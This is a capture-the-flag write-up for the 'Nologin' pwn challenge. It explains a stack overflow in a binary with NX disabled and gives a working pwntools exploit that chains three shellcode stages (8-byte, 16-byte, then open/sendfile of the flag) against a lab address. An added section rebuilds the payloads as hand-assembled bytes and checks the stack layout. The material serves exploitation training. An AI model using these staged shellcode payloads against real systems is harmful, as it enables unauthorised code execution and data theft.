[PWN] Nologin - xf1les
xp0int, posted on Sep 12 2021

There is a stack overflow in user. The binary has NX disabled, so shellcode can be executed on the stack, but the room for shellcode on the stack is tiny: only 8 bytes.

The first-stage shellcode therefore only calls sub_40095D, which writes the second-stage shellcode onto the stack, and then jumps to it. The second stage can be at most 16 bytes.

The second stage works like the first: it writes the third-stage shellcode onto the stack. The third stage then opens the flag file and writes it to stdout.

```
#!/usr/bin/env python3
from pwn import *

warnings.filterwarnings("ignore", category=BytesWarning)  # str payloads are fine here
context(arch="amd64")
context(log_level="debug")
context.proxy = "127.0.0.1"   # route the connection through a local SOCKS proxy

p = remote("192.168.40.193", 40001)
# ~ p = process("./nologin")

p.sendlineafter(">", "2")

## 1st shellcode (8 bytes)
## Calls sub_40095D with rdi = rax so that the next "password" input, i.e. the
## 2nd shellcode, is read over this very buffer. The address of sub_40095D is
## placed on the stack right after the return address, so [rsp] points at it
## once the ret has been executed.
s = """
push rax
pop rdi
// [rsp] holds 0x40095D
mov ebx, [rsp]
call rbx
nop
"""
## rax is pointing to 1st shellcode on stack
jmp_rax = 0x400851
p.sendlineafter("password:", b'A'*5 + asm(s) + p64(jmp_rax) + p64(0x40095D))

## 2nd shellcode (at most 16 bytes; this one is 11)
## Reads the 3rd shellcode from stdin over this buffer. The 8 filler bytes
## overwrite the 1st shellcode and jmp_rsp lands in the return-address slot
## pushed by `call rbx`, so sub_40095D returns straight into this code.
## This shellcode is itself overwritten by the 3rd shellcode during the read
## syscall; execution simply continues into the 3rd shellcode's nop sled.
s = """
// avoid shellcode being corrupted by pop, push instruction
xchg rsp, r13
// r11 = 0x246 (rflags saved by the previous syscall), reused as the read length
push r11
pop rdx
// r10 = 0 = SYS_read; rdi and rsi are left over from the previous read
push r10
pop rax
syscall
"""
## rsp is pointing to 2nd shellcode
jmp_rsp = 0x4016fb
p.sendlineafter("password:", b'A'*0x8 + p64(jmp_rsp) + asm(s))

## 3rd shellcode
## open("flag", O_RDONLY) followed by sendfile(1, fd, NULL, 0x80): the flag goes
## straight to stdout without needing a buffer. Padded with nops on both sides
## because it lands in the buffer while the 2nd shellcode is still running, so
## the exact byte at which execution continues is not known.
s = """
mov rax, 0x67616c66   // "flag" followed by NUL padding, little-endian
push rax              // rsp now points at the NUL-terminated path
mov rdi, rsp
xor rsi, rsi          // O_RDONLY
mov rax, SYS_open
syscall
mov rdi, 1            // out_fd = stdout
xchg rsi, rax         // in_fd = fd returned by open
xor rdx, rdx          // offset = NULL
mov r10, 0x80         // count
mov rax, SYS_sendfile
syscall
"""
p.sendline(b"\x90"*0x30 + asm(s) + b"\x90"*0x30)

p.interactive()
```
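The part of this chain that is easy to get wrong is the shape of the second payload: why exactly 8 filler bytes, and why jmp_rsp goes where it does. The following is an added example, not the writeup's script: it rebuilds the three payloads without pwntools (the machine code is hand-assembled from the instruction listings above, the gadget and function addresses are the writeup's) and models the stack slots to check that the `call rbx` return address is the qword jmp_rsp overwrites and that `jmp rsp` lands on stage 2. The buffer address is a placeholder, and the one layout assumption is the writeup's own: rax points at the first-stage shellcode.

```python
#!/usr/bin/env python3
"""Stack model and payload layout for the three-stage Nologin chain (added example)."""
import struct

JMP_RAX = 0x400851   # jmp rax gadget (from the writeup)
JMP_RSP = 0x4016FB   # jmp rsp gadget (from the writeup)
LOADER = 0x40095D    # sub_40095D: reads the next "password" into rdi (from the writeup)

# Hand-assembled amd64 machine code, one listing per stage.
STAGE1 = bytes.fromhex(
    "50"        # push rax
    "5f"        # pop rdi          -> rdi = rax = this buffer
    "8b1c24"    # mov ebx, [rsp]   -> rbx = LOADER, the qword after the return address
    "ffd3"      # call rbx         -> sub_40095D reads the next payload over us
    "90"        # nop
)
STAGE2 = bytes.fromhex(
    "4987e5"    # xchg rsp, r13    -> move the stack off the shellcode
    "4153"      # push r11
    "5a"        # pop rdx          -> rdx = saved rflags (0x246), the read length
    "4152"      # push r10
    "58"        # pop rax          -> rax = 0 = SYS_read
    "0f05"      # syscall          -> read(rdi, rsi, 0x246) over this buffer
)
STAGE3 = bytes.fromhex(
    "48c7c0666c6167"  # mov rax, 0x67616c66   ("flag" + NUL padding)
    "50"              # push rax
    "4889e7"          # mov rdi, rsp
    "4831f6"          # xor rsi, rsi          (O_RDONLY)
    "48c7c002000000"  # mov rax, 2            (SYS_open)
    "0f05"            # syscall
    "48c7c701000000"  # mov rdi, 1            (stdout)
    "4896"            # xchg rsi, rax         (in_fd = the opened file)
    "4831d2"          # xor rdx, rdx          (offset = NULL)
    "49c7c280000000"  # mov r10, 0x80         (count)
    "48c7c028000000"  # mov rax, 40           (SYS_sendfile)
    "0f05"            # syscall
)


def path_immediate(name):
    """Immediate that a single `push` drops on the stack as a NUL-terminated path.

    `push rax` writes all 8 bytes of rax, so a name of up to 7 bytes gets its
    terminating NUL (and padding) for free from the zero-padded immediate.
    """
    if len(name) > 7:
        raise ValueError("one pushed qword only fits 7 bytes plus the NUL")
    return struct.unpack("<Q", name.ljust(8, b"\0"))[0]


def build_payloads():
    """The three inputs in the order the writeup sends them."""
    payload1 = b"A" * 5 + STAGE1 + struct.pack("<QQ", JMP_RAX, LOADER)
    payload2 = b"A" * 8 + struct.pack("<Q", JMP_RSP) + STAGE2
    payload3 = b"\x90" * 0x30 + STAGE3 + b"\x90" * 0x30
    return payload1, payload2, payload3


def within_budgets():
    """The writeup's size limits: exactly 8 bytes for stage 1, at most 16 for stage 2."""
    return len(STAGE1) == 8 and len(STAGE2) <= 16


def stack_model(stage1_addr=0x7FFFFFFFE000):
    """Check the slot arithmetic behind payload 2 (stage1_addr is a placeholder for rax)."""
    ret_slot = stage1_addr + len(STAGE1)   # saved return address, overwritten with JMP_RAX
    rsp_in_stage1 = ret_slot + 8           # after `ret`, [rsp] is the LOADER qword
    call_ret_slot = rsp_in_stage1 - 8      # `call rbx` pushes its return address here
    # sub_40095D reads payload 2 starting at rdi = stage1_addr:
    jmp_rsp_slot = stage1_addr + 8         # the qword after the 8 filler bytes
    stage2_addr = jmp_rsp_slot + 8
    rsp_after_loader_ret = call_ret_slot + 8
    return {
        "jmp_rsp overwrites the return address pushed by call rbx": jmp_rsp_slot == call_ret_slot,
        "jmp rsp lands on stage 2": stage2_addr == rsp_after_loader_ret,
    }


if __name__ == "__main__":
    for i, payload in enumerate(build_payloads(), 1):
        print(f"payload {i} ({len(payload)} bytes): {payload.hex()}")
    print("budgets ok:", within_budgets())
    for claim, ok in stack_model().items():
        print(f"{claim}: {ok}")
```

The model makes the trick explicit: after the first `ret`, rsp sits one qword past the overwritten return address, so `call rbx` pushes its own return address into exactly that slot. Payload 2's 8 filler bytes cover stage 1 and its next qword therefore replaces that pushed return address with jmp_rsp, and when sub_40095D returns, rsp points at the bytes that follow, which is where stage 2 was read. The same arithmetic is what limits stage 2 to the bytes sub_40095D is willing to read past that point.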